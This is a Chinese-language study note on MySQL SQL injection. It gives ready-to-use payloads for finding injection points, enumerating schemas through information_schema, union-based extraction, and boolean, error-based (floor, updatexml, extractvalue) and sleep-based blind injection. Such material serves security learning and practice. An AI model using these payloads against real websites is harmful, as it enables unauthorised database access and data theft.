MySQL数据库初始的数据库有:
information_schema,mysql,performance_schema与test。
SQL注入难点:盲注,延时注入,文件导出;
在有些浏览器中,可以使用'--+'进行注释但不能使用'#';
SQL注入实质:就我自己而言所理解的SQL注入是注入的内容与前面的SQL语句重新构造成一个新的SQL语句来完成自己的需求。
SQL注入刚开始时要判断是否有注入点;
常用的判断方法(url):
/?id=1--+
/?id=1'--+
/?id=1"--+
/?id=1')--+
/?id=0' or 1=1--+
/?id=1' and 1=0--+
常用函数:
1. version()——MySQL 版本
2. user()——数据库用户名
3. database()——数据库名
4. @@datadir——数据库路径
5. @@version_compile_os——操作系统版本
常用连接函数:
1. concat(str1,str2,...)——没有分隔符地连接字符串
2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
3. group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据
排序(order by)
如果我们需要对读取的数据进行排序,我们就可以使用 MySQL 的order by子句来设定你想按哪个字段哪种方式来进行排序,再返回搜索结果
order by使用:
你可以使用任何字段来作为排序的条件,从而返回排序后的查询结果。
默认情况下,它是按升序排列。
你可以添加 WHERE...LIKE 子句来设置条件。
联合查询:
union操作符:
union操作符用于合并两个或多个select语句的结果集。
union内部的select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。
每条select语句中的列的顺序必须相同。
多个select语句会删除重复的数据。
联合查询需要建立在有显示位的基础上。输入id=0(-1)的原因是如果输入一个有意义的值,那么网页就会返回一个相应的值,这时,它会覆盖后面联合查询出的结果,所以要用一个无意义的值来避免覆盖。我们在知道显示位的时候可以在相应的位置写入希望查询的语句。
查询函数:
group_concat:将数据呈一行显示,有的时候数据过多没办法使用的时候可以用limit来对输出的数据进行限制。
db_name:你想查找的数据库的名字
tb_name:你想查找的数据表的名字
col_name:你想查找的字段的名字(字段=列)
常用查询语句:
查询所有数据库名:
select group_concat(schema_name) from information_schema.schemata
查询当前数据库:
select database();
查询数据库的所有数据表:
select group_concat(table_name) from information_schema.tables where table_schema='db_name'
查询字段名:
1.select group_concat(column_name) from infromation_schema.columns where table_schema='db_name' and table_name='tb_name'
2.Select column_name from information_schema.columns where table_name='dbname'
查询数据:select group_concat(col_name) from db_name.tb_name
盲注
盲注的分类:
基于布尔 SQL 盲注
基于时间的 SQL 盲注
基于报错的 SQL 盲注
盲注常用的函数:
mid()函数
mid(string,start,length)
mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位
substr()函数
substr(string,start,length)
substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。Ascii()将某个字符转换为 ascii 值
left()函数
left(string,length)
left(database(),1)>’s’ //database()显示数据库名称,left(a,b)从左侧截取 a 的前 b 位
string:规定要返回的字符串。
start:规定在字符串的何处开始(初始值为1)。
length:规定被返回字符串的长度(可以省略,若省略则返回剩余所有文本)。
在比较的时候可以直接使用单引号>‘s’,也可以先转换位ascii码的形式再进行比较。
布尔盲注的原理是根据页面返回的是true还是false来判断比较的字母是否正确。例如,如果数据库的第一个字母在ASCII表中小于与100相对应的字母,那么就会返回正常情况下的成功页面;如果不小于的话,就会返回错误的页面。
报错注入:
报错注入也是盲注的一种,应该为基于盲注的报错注入。目的是构造 payload 让信息通过错误提示回显出来。
常用报错方式:
floor报错:
▲and (select 1 from(select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
floor()函数原本为向下取整,其中rand()函数为随机数生成,不能于order by共用,数据记录必须有两条以上
▲Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))
a from information_schema.columns group by a;
▲select count(*) from information_schema.tables group by concat(version(),
floor(rand(0)*2))
▲select count(*) from (select 1 union select null unionselect !1) group by concat(version(),floor(rand(0)*2))
此处有三个点,一是需要 concat 计数,二是 floor,取得 0 or 1,进行数据的重复,三是 group by 进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。
updatexml报错:
and updatexml(1,payload,1)
语句对payload的返回类型做了限制,只有在payload返回的不是xml格式才会生效,查询时使用的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,出现查询结果。
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误
extractvalue()报错:
and extractvalue(1, payload)
其中payload是想要输入的查询子句。
extractvalue(1,concat(0x7e,(select @@version),0x7e))
//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误
报错注入我使用的并不熟练,在此感谢大佬的文章SQL注入大法 -
延时注入
sleep(n):网页延迟n秒输出结果;
if(a,b,c):if判断句,a为条件,b、c为执行语句;如果a为真就执行b,a为假就执行c;
length(database()):返回当前数据库名长度;
If(ascii(substr(database(),1,1))>115,0,sleep(5))--+
//if 判断语句,条件为假,执行 sleep
以上所述只是简单的基础操作,在实际的SQL注入中还有许多需要注意的问题。
如:导入导出,宽字节注入……
但基础操作和中心思想却没有大的变化。